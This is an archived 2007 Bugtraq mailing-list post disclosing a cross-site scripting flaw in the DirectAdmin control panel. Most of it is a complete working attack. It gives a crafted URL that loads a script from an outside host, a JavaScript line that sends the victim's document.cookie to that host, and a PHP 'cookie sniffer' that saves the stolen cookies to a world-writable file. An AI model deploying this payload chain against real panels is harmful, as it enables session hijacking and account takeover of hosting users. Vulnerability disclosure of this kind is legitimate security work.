lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070315234810.32033.qmail@securityfocus.com>
Date: 15 Mar 2007 23:48:10 -0000
From: Mandr4ke.root@...il.com
To: bugtraq@...urityfocus.com
Subject: DirectAdmin Cross Site Scripting XSS

-=[Fusi0n Group]=-

# Script name .....: DirectAdmin
# Script site .....: http://directadmin.com
# Release Date ....: 15/03/2007
# Version .........: All
# Find by .........: Mandr4ke
# Contact .........: Mandr4ke.root[at]gmail.com
# Greetings .......: Fusi0nGroup & DevilTeam & Nof

-----------------------------------------------------------
Exploit: DirectAdmin Cross Site Scripting XSS
-----------------------------------------------------------

#
# All DirectAdmin level: User,Reseller,Admin.
#
# Exploit:
#
# http://localhost:2222/CMD_USER_STATS?RESULT=%3Cscript%20src='http://server.com/script.js'%3E&domain=
#


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/script.php = CHMOD 777 

Source:

<?php
  $filename = "cookies.txt";
  if (isset($_GET["cookie"]))
  {
    if (!$handle = fopen($filename, 'a'))
    {
      echo ".";
      exit;
    }
    else
    {
      if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
      {
        echo ".";
        exit;
      }
    }
    echo ".";
    fclose($handle);
    exit;
  }
  echo ".";
  exit;

//Cookie Sniffer by Kacper - DevilTeam

?>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/script.js

Source:

location.href='http://server.com/script.php?cookie='+escape(document.cookie)

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/cookies.txt = CHMOD 777

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#
# PS ..............: Attacker must be authenticated
# Contact .........: Mandr4ke.root[at]gmail.com
#

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ